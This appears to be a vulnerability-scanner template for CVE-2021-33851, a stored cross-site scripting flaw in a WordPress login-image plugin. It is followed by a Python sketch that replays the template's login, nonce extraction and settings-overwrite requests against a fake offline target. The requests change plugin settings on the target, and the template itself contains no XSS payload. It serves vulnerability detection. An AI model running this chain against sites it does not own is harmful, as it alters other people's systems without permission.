id: CVE-2021-33851

info:
  name: Customize Login Image < 3.5.3 - Cross-Site Scripting
  author: 8authur
  severity: medium
  description: |
    A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
  reference:
    - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
    - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
    - https://wordpress.org/plugins/customize-login-image/
    - https://nvd.nist.gov/vuln/detail/cve-2021-33851
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-33851
    cwe-id: CWE-79
  metadata:
    verified: "true"
  tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=&cli_logo_file=&cli_login_background_color=&cli_custom_css=

      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_4 == 200'
          - 'contains(all_headers_4, "text/html")'
          - 'contains(body_4, "Go to ")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
        internal: true
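Added example, not part of the template above and not code from the nuclei project: a Python sketch of what the engine does with this file. It logs in with the template's first request, pulls the nonce out of the settings page with the template's own extractor regex, substitutes it into the third request's form body (field set and empty values exactly as the template sends them), and evaluates the `_4` DSL matcher with `condition: and` against the fourth response. `run_check`, `fake_send`, `FAKE_TARGET`, the placeholder credentials and the sample response bodies are assumptions made for an offline run; `all_headers` is approximated as the rendered header block.

```python
import re
from urllib.parse import urlencode

# Values the template takes from the operator ({{username}} / {{password}}).
# Placeholders assumed for the offline demo.
USERNAME = "admin"
PASSWORD = "password"

SETTINGS_PATH = ("/wp-admin/options-general.php"
                 "?page=customize-login-image/customize-login-image-options.php")
# Decoded form of the _wp_http_referer value in the template's third request.
REFERER = ("/wordpress/wp-admin/options-general.php"
           "?page=customize-login-image%2Fcustomize-login-image-options.php"
           "&settings-updated=true")

# Regex copied from the template's `nonce` extractor; group 1 is the nonce value.
NONCE_RE = re.compile(r'name="_wpnonce" value="([0-9a-zA-Z]+)"')


def extract_nonce(body):
    """Template extractor `nonce` (internal: true): group 1 of the first match
    in the settings page, or None when the page carries no nonce field."""
    m = NONCE_RE.search(body)
    return m.group(1) if m else None


def build_update_body(nonce):
    """Form body of the template's third request with {{nonce}} substituted.
    urlencode() reproduces the template's percent-encoding of the referer."""
    fields = [
        ("option_page", "customize-login-image-settings-group"),
        ("action", "update"),
        ("_wpnonce", nonce),
        ("_wp_http_referer", REFERER),
        ("cli_logo_url", ""),
        ("cli_logo_file", ""),
        ("cli_login_background_color", ""),
        ("cli_custom_css", ""),
    ]
    return urlencode(fields)


def evaluate_matchers(responses):
    """The template's DSL matcher under req-condition: true. The `_4` suffix
    binds to the fourth response; `condition: and` needs all three clauses."""
    if len(responses) < 4:
        return False
    status, headers, body = responses[3]
    all_headers = "\n".join(f"{k}: {v}" for k, v in headers.items())
    return status == 200 and "text/html" in all_headers and "Go to " in body


def run_check(send):
    """Drive the four template requests through send(method, path, headers, body)
    -> (status, headers, body). cookie-reuse: true means `send` must keep the
    session cookie between calls (a requests.Session does). Returns (matched, nonce)."""
    form = {"Content-Type": "application/x-www-form-urlencoded"}
    r1 = send("POST", "/wp-login.php", form,
              f"log={USERNAME}&pwd={PASSWORD}&wp-submit=Log+In")
    r2 = send("GET", SETTINGS_PATH, {}, None)
    nonce = extract_nonce(r2[2])
    if nonce is None:            # {{nonce}} unresolved: request 3 cannot be built
        return False, None
    r3 = send("POST", "/wp-admin/options.php", form, build_update_body(nonce))
    r4 = send("GET", "/wp-login.php", {}, None)
    return evaluate_matchers([r1, r2, r3, r4]), nonce


# Constructed offline stand-in for a target (not captured WordPress traffic):
# (method, path) -> (status, headers, body) for each of the four requests.
FAKE_TARGET = {
    ("POST", "/wp-login.php"): (302, {"Location": "/wp-admin/"}, ""),
    ("GET", SETTINGS_PATH): (200, {"Content-Type": "text/html; charset=UTF-8"},
        '<form action="options.php"><input type="hidden" id="_wpnonce" '
        'name="_wpnonce" value="a1b2c3d4e5" /></form>'),
    ("POST", "/wp-admin/options.php"): (302,
        {"Location": SETTINGS_PATH + "&settings-updated=true"}, ""),
    ("GET", "/wp-login.php"): (200, {"Content-Type": "text/html; charset=UTF-8"},
        '<h1><a href="https://example.test/">Go to example.test</a></h1>'),
}


def fake_send(method, path, headers, body):
    """Transport for the constructed target; ignores headers and body."""
    return FAKE_TARGET[(method, path)]


if __name__ == "__main__":
    print(run_check(fake_send))
```

For a live run, wrap a `requests.Session` in a `send` that prefixes the base URL and supply the real credentials, as the template itself needs `{{username}}` and `{{password}}` provided. Note that the third request, as written on this page, posts the plugin's settings fields empty, so both the template and this script overwrite the Customize Login Image settings of the account they log in with; run them only against an instance you own.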